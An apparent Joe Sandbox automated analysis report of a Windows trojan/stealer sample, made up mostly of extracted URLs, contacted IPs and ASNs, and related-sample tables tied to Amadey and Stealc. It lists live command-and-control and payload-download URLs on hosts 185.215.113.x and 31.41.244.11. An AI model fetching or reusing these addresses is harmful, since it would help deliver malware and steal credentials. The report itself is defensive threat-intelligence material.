                                                                                                                      https://outlook.office.com/mail/compose?isExtension=trued26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                        high
                                                                                                                        https://unitedstates4.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drfalse
                                                                                                                          high
                                                                                                                          https://i.y.qq.com/n2/m/index.htmld26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                            high
                                                                                                                            https://www.deezer.com/d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                              high
                                                                                                                              http://185.215.113.206lfonsE89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000C05000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                high
                                                                                                                                https://web.telegram.org/d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                  high
                                                                                                                                  http://www.mozilla.com/en-US/blocklist/E89hSGjVrv.exe, 00000000.00000002.2625912416.000000006C57D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://mozilla.org0/freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://drive-daily-2.corp.google.com/manifest.json.8.drfalse
                                                                                                                                        high
                                                                                                                                        http://31.41.244.11/files/random.exe07797001skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: phishing
                                                                                                                                        unknown
                                                                                                                                        https://drive-daily-4.corp.google.com/manifest.json.8.drfalse
                                                                                                                                          high
                                                                                                                                          https://vibe.naver.com/todayd26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                            high
                                                                                                                                            https://srtb.msn.com/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                              high
                                                                                                                                              https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drfalse
                                                                                                                                                high
                                                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=E89hSGjVrv.exe, 00000000.00000003.2361209484.0000000023E9C000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.dr, Web Data.8.dr, GIJJKKJJ.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.ecosia.org/newtab/E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://drive-daily-1.corp.google.com/manifest.json.8.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://excel.new?from=EdgeM365Shorelined26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brEHIJDHCAKKFCBGCBAAECFIJDAK.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://185.215.113.206/c4becf79229cb002.php2E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://drive-daily-5.corp.google.com/manifest.json.8.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://play.google.com/log?format=json&hasfast=truechromecache_467.4.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.9.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://31.41.244.11/215.113.43/Zu7JuNko/index.phpskotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: phishing
                                                                                                                                                                  unknown
                                                                                                                                                                  http://185.215.113.206/68b591d6548ec281/freebl3.dlloE89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  unknown
                                                                                                                                                                  https://www.google.com/chromecontent_new.js.8.dr, content.js.8.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.tiktok.com/d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.msn.com/web-notification-icon-light.png2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLEHIJDHCAKKFCBGCBAAECFIJDAK.0.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refE89hSGjVrv.exe, 00000000.00000002.2617610604.0000000023EF1000.00000004.00000020.00020000.00000000.sdmp, IDHIEBAAKJDHIECAAFHC.0.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://chromewebstore.google.com/manifest.json0.8.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://185.215.113.206/68b591d6548ec281/nss3.dllOE89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                              unknown
                                                                                                                                                                              http://31.41.244.11/files/random.exephpskotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                              unknown
                                                                                                                                                                              https://drive-preprod.corp.google.com/manifest.json.8.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://srtb.msn.cn/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477E89hSGjVrv.exe, 00000000.00000002.2617610604.0000000023EF1000.00000004.00000020.00020000.00000000.sdmp, IDHIEBAAKJDHIECAAFHC.0.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://msn.comXIDv10Cookies.9.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://31.41.244.11/files/random.exeskotes.exe, 00000018.00000002.3301990970.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://chrome.google.com/webstore/manifest.json0.8.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://y.music.163.com/m/d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://unitedstates2.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://bard.google.com/d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://browser.events.data.msn.com/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://web.whatsapp.comd26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://m.kugou.com/d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://185.215.113.206/c4becf79229cb002.phpdE89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001641000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.office.comd26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://outlook.live.com/mail/0/d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiIDHIEBAAKJDHIECAAFHC.0.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://ntp.msn.com/edge/ntp2cc80dabc69f58b6_1.8.dr, 000003.log9.8.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://assets.msn.com/resolver/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://powerpoint.new?from=EdgeM365Shorelined26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=E89hSGjVrv.exe, 00000000.00000003.2361209484.0000000023E9C000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.dr, Web Data.8.dr, GIJJKKJJ.0.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://185.215.113.206/c4becf79229cb002.phppE89hSGjVrv.exe, 00000000.00000002.2617610604.0000000023EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://tidal.com/d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://ntp.msn.com000003.log3.8.dr, 2cc80dabc69f58b6_0.8.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://browser.events.data.msn.cn/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                    142.250.186.46
                                                                                                                                                                                                                                    play.google.comUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    185.215.113.43
                                                                                                                                                                                                                                    unknownPortugal
                                                                                                                                                                                                                                    206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                    23.57.90.137
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    35994AKAMAI-ASUSfalse
                                                                                                                                                                                                                                    142.250.185.228
                                                                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    142.250.185.206
                                                                                                                                                                                                                                    plus.l.google.comUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    13.107.246.40
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    20.189.173.9
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    23.96.180.189
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    13.107.246.45
                                                                                                                                                                                                                                    s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    23.200.88.39
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                    13.226.94.6
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                    20.110.205.119
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    204.79.197.219
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    23.55.235.251
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                    172.64.41.3
                                                                                                                                                                                                                                    chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    31.41.244.11
                                                                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                                                                    61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                                    104.70.121.195
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                    23.57.90.101
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    35994AKAMAI-ASUSfalse
                                                                                                                                                                                                                                    94.245.104.56
                                                                                                                                                                                                                                    ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    185.215.113.16
                                                                                                                                                                                                                                    unknownPortugal
                                                                                                                                                                                                                                    206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                    172.217.18.1
                                                                                                                                                                                                                                    googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    13.32.99.105
                                                                                                                                                                                                                                    sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                    172.183.192.109
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    7018ATT-INTERNET4USfalse
                                                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                                                                    185.215.113.206
                                                                                                                                                                                                                                    unknownPortugal
                                                                                                                                                                                                                                    206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                    192.168.2.5
                                                                                                                                                                                                                                    127.0.0.1
                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                    Analysis ID:1559850
                                                                                                                                                                                                                                    Start date and time:2024-11-21 00:48:12 +01:00
                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                    Overall analysis duration:0h 6m 57s
                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                    Number of analysed new started processes analysed:25
                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                    Sample name:E89hSGjVrv.exe
                                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                                    Original Sample Name:136dfe4a8f2801c7836bb2518b2eb57142e57efb77a665830a00335fdfe0c2bd.exe
                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@72/302@32/27
                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.181.238, 142.251.5.84, 34.104.35.123, 172.217.16.195, 199.232.210.172, 142.250.185.234, 142.250.186.106, 142.250.186.74, 216.58.206.74, 172.217.18.10, 142.250.184.234, 172.217.23.106, 142.250.186.138, 216.58.212.170, 142.250.74.202, 142.250.185.202, 142.250.186.42, 142.250.185.138, 142.250.185.74, 142.250.185.170, 172.217.16.202, 142.250.186.170, 142.250.185.106, 216.58.206.42, 172.217.16.138, 142.250.181.234, 142.250.184.202, 192.229.221.95, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 13.107.6.158, 4.231.68.226, 2.19.126.145, 2.19.126.152, 2.23.209.130, 2.23.209.133, 88.221.110.195, 88.221.110.179, 2.23.209.187, 2.23.209.20, 2.23.209.51, 2.23.209.3, 2.23.209.52, 2.23.209.13, 2.23.209.45, 2.23.209.59, 2.23.209.28, 2.23.209.57, 13.74.129.1, 13.107.21.237, 204.79.197.237, 20.93.72.182, 2.19.126.151, 2.19.126.157, 142.250.80.67, 142.250.65.227, 142.251.40.163, 172.217.165.131, 142.251.41.3, 142.250.65.195
                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, wildcardtlu-ssl.azureedge.net, prod-agic-we-8.westeurope.cloudapp.azure.com, edgedl.me.gvt1.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, c
                                                                                                                                                                                                                                    • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                    • VT rate limit hit for: E89hSGjVrv.exe
                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                    00:49:57Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                    18:49:35API Interceptor158x Sleep call for process: E89hSGjVrv.exe modified
                                                                                                                                                                                                                                    18:51:01API Interceptor73x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    185.215.113.43file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                    13.107.246.40Payment Transfer Receipt.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • www.aib.gov.uk/
                                                                                                                                                                                                                                    NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 2s.gg/3zs
                                                                                                                                                                                                                                    PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 2s.gg/42Q
                                                                                                                                                                                                                                    06836722_218 Aluplast.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 2s.gg/3zk
                                                                                                                                                                                                                                    Quotation.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 2s.gg/3zM
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    sb.scorecardresearch.comfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 18.165.220.106
                                                                                                                                                                                                                                    https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 18.165.220.66
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 18.165.220.66
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 18.165.220.110
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 18.165.220.110
                                                                                                                                                                                                                                    https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 18.165.220.106
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 18.165.220.57
                                                                                                                                                                                                                                    WSock.dllGet hashmaliciousRamnitBrowse
                                                                                                                                                                                                                                    • 18.244.18.38
                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                    • 18.245.60.107
                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                    • 18.245.60.53
                                                                                                                                                                                                                                    chrome.cloudflare-dns.comfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    WSock.dllGet hashmaliciousRamnitBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    ssl.bingadsedgeextension-prod-europe.azurewebsites.netfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    MICROSOFT-CORP-MSN-AS-BLOCKUShttps://docusign685420961463outlook99742742685.glitch.me/#cGFsdmEwMUBtc24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 52.155.5.177
